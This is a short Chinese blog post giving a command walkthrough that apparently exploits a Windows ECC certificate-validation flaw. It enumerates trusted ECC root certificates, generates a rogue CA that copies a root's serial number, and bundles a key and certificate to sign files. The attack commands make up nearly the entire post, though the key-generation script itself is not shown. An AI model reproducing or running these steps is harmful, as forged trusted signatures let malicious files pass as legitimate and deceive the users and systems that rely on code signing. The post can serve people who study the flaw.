安装依赖
1 |
pip3 install fastecdsa |
获取系统ecc加密的证书
1 |
dir Cert:\LocalMachine\root -Recurse|?{$_.FriendlyName -like "*ECC*"} |%{New-Object -TypeName psobject -Property @{ |
1 |
SerialNumber : 0x153875e1647ed1b047b4efaf41128245 |
修改: openssl.cnf
1 |
[ req ] |
修改gen-key.py
publickey剔除开头的04
1 |
python3 gen-key.py |
填入SerialNumber
1 |
openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x14982666dc7ccd8f4053677bb999ec85 |
1 |
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem |
生成 pkcs12并对文件进行签名
1 |
openssl pkcs12 -export -in client-cert.pem -inkey prime256v1-privkey.pem -certfile ca-rogue.pem -out cert.p12 |
效果
感谢: zcgonvh & scanf 提供思路
FROM :WOLVEZ'S BLOG| Author:wolve
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论